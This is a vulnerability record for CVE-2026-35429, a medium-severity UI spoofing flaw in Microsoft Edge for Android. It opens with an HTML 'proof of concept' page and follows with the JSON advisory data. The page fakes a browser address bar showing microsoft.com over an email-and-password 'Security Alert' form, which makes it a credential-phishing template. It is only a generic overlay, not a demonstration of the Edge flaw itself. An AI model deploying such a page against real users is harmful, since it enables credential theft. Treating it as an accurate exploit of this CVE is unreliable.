CVE-2026-35429

<!-- Proof of Concept: UI Spoofing Simulation --> <!DOCTYPE html> <html> <head> <style> /* Styles to mimic browser address bar */ .fake-bar { position: fixed; top: 0; left: 0; width: 100%; height: 40px; background: #333; color: white; display: flex; align-items: center; padding: 0 10px; font-family: sans-serif; z-index: 9999; } .content { margin-top: 50px; padding: 20px; } </style> </head> <body> <!-- Fake Address Bar --> <div class="fake-bar"> <span>🔒 https://www.microsoft.com</span> </div> <!-- Malicious Content --> <div class="content"> <h2>Security Alert</h2> <p>Please verify your credentials.</p> <input type="text" placeholder="Email" /><br><br> <input type="password" placeholder="Password" /> </div> </body> </html>

{"cve": {"id": "CVE-2026-35429", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:13.510", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35429", "source": "[email protected]"}]}}